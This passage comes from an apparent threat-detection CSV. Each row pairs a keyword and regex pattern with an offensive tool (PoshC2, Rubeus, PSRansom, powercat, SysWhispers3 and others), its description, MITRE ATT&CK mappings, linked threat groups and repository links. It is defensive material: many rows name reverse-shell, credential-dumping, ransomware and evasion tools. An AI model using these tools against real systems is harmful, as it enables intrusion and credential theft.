Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","2631" "* popcalc64.bin *",".{0,1000}\spopcalc64\.bin\s.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","2632" "* PopUpRansom*",".{0,1000}\sPopUpRansom.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. 
you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","9","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","2633" "* --port 1337*",".{0,1000}\s\-\-port\s1337.{0,1000}","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","N/A","10","5","495","146","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z","2634" "* port_reuse.py*",".{0,1000}\sport_reuse\.py.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","2635" "* port_scan.py*",".{0,1000}\sport_scan\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic 
Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2636" "* Port-Scan.ps1*",".{0,1000}\sPort\-Scan\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","2639" "* PortScanner.ahk*",".{0,1000}\sPortScanner\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","2640" "* port-states.nse*",".{0,1000}\sport\-states\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2641" "* PoshC2 *",".{0,1000}\sPoshC2\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","2642" "* -PoshC2Dir *",".{0,1000}\s\-PoshC2Dir\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - 
Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","2643" "* -PoshC2Dir *",".{0,1000}\s\-PoshC2Dir\s.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","2644" "* PostDump.exe*",".{0,1000}\sPostDump\.exe.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","2645" "* PotentiallyCrackableAccounts.ps1*",".{0,1000}\sPotentiallyCrackableAccounts\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool 
also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","2646" "* PowerBreach.ps1*",".{0,1000}\sPowerBreach\.ps1.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","2647" "* powercat.ps1",".{0,1000}\spowercat\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2648" "* powercat.ps1*",".{0,1000}\spowercat\.ps1.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","2649" "* PowerLurk.ps1*",".{0,1000}\sPowerLurk\.ps1.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subscriptions","T1084 - T1059.001 - T1546.003 - 
T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","2650" "* Powermad.ps1*",".{0,1000}\sPowermad\.ps1.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","2651" "* PowerTools.ps1*",".{0,1000}\sPowerTools\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","2652" "* PowerUp.ps1*",".{0,1000}\sPowerUp\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","2653" "* PowerUpSQL.ps1*",".{0,1000}\sPowerUpSQL\.ps1.{0,1000}","offensive_tool_keyword","PowerUpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Black 
Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PowerUpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","2654" "* PowerUpSQL.ps1*",".{0,1000}\sPowerUpSQL\.ps1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PowerUpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","2655" "* powerview.py*",".{0,1000}\spowerview\.py.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","2656" "* ppid_spoofing.exe*",".{0,1000}\sppid_spoofing\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2657" "* PPLmedic.exe*",".{0,1000}\sPPLmedic\.exe.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/itm4n/PPLmedic","1","0","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","2658" "* pptp-version.nse*",".{0,1000}\spptp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2659" "* Pre2kSpray.ps1*",".{0,1000}\sPre2kSpray\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Pre2kSpray","Enumerate domain machine accounts and perform pre2k password spraying.","T1087.002 - T1110.003","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/eversinc33/Invoke-Pre2kSpray","1","0","N/A","N/A","8","1","69","11","2023-07-14T06:50:22Z","2023-07-05T10:07:38Z","2660" "* preauthscan /users:*",".{0,1000}\spreauthscan\s\/users\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","2661" "* prepare.sh shell/mod_*.htaccess*",".{0,1000}\sprepare\.sh\sshell\/mod_.{0,1000}\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","#linux","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","2662" "* --preset all -o syscalls_all*",".{0,1000}\s\-\-preset\sall\s\-o\ssyscalls_all.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1059 - T1573 - T1218 - T1216","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","N/A","10","1414","180","2024-07-31T05:24:06Z","2022-03-07T18:56:21Z","2663" "* --preset common -o syscalls_common*",".{0,1000}\s\-\-preset\scommon\s\-o\ssyscalls_common.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1059 - T1573 - T1218 - T1216","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","N/A","10","1414","180","2024-07-31T05:24:06Z","2022-03-07T18:56:21Z","2664" "*---------- Prince Ransomware ----------*",".{0,1000}\-\-\-\-\-\-\-\-\-\-\sPrince\sRansomware\s\-\-\-\-\-\-\-\-\-\-.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 
- T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","0","#content","N/A","10","1","N/A","N/A","N/A","N/A","2665" "* PrincipalsAllowedToDelegateToAccount *",".{0,1000}\sPrincipalsAllowedToDelegateToAccount\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","2666" "* PrintCreds.py*",".{0,1000}\sPrintCreds\.py.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","2667" "* printerbug.py*",".{0,1000}\sprinterbug\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - 
TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","2668" "* printing the golden data, format inspired by Responder :D*",".{0,1000}\sprinting\sthe\sgolden\sdata,\sformat\sinspired\sby\sResponder\s\:D.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","2669" "* Priv_Esc.sh*",".{0,1000}\sPriv_Esc\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","2670" "* --private-key terraform-keys reconFTW.yml*",".{0,1000}\s\-\-private\-key\sterraform\-keys\sreconFTW\.yml.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","2671" "* --priv-esc*",".{0,1000}\s\-\-priv\-esc.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - 
APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","2672" "* privesc.ps1*",".{0,1000}\sprivesc\.ps1.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","0","N/A","N/A","10","6","595","97","2024-12-01T15:24:41Z","2015-11-19T13:22:01Z","2673" "* PrivescCheck.ps1*",".{0,1000}\sPrivescCheck\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","2674" "* Process spawned with stolen token!*",".{0,1000}\sProcess\sspawned\swith\sstolen\stoken!.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","2677" "* processinjection.exe*",".{0,1000}\sprocessinjection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2678" "* ProtectMyTooling.py*",".{0,1000}\sProtectMyTooling\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2679" "* ProtectMyToolingGUI.py*",".{0,1000}\sProtectMyToolingGUI\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2680" "* proxychains *",".{0,1000}\sproxychains\s.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black 
Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","2681" "* proxylogon.py*",".{0,1000}\sproxylogon\.py.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hausec/ProxyLogon","1","0","N/A","N/A","10","3","293","76","2024-07-02T10:00:00Z","2021-03-15T14:37:57Z","2682" "* ProxyStream *Stowaway*",".{0,1000}\sProxyStream\s.{0,1000}Stowaway.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","2683" "* proxyTunnel.ps1*",".{0,1000}\sproxyTunnel\.ps1.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","0","N/A","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","2684" "* ps /target:*.xml /unprotect*",".{0,1000}\sps\s\/target\:.{0,1000}\.xml\s\/unprotect.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","2685" "* PS1ToBase64.ps1*",".{0,1000}\sPS1ToBase64\.ps1.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on 
powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","2686" "* PS2EXE.ps1*",".{0,1000}\sPS2EXE\.ps1.{0,1000}","offensive_tool_keyword","PS2EXE","Convert Powershell scripts to EXEs","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/PS2EXE","1","0","N/A","N/A","7","1","5","1","2024-08-31T12:34:50Z","2024-08-22T12:22:26Z","2687" "* PSAsyncShell.ps1*",".{0,1000}\sPSAsyncShell\.ps1.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","0","N/A","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","2689" "* PSAsyncShell.sh*",".{0,1000}\sPSAsyncShell\.sh.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","0","N/A","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","2690" "* psexec_merged.bin*",".{0,1000}\spsexec_merged\.bin.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode 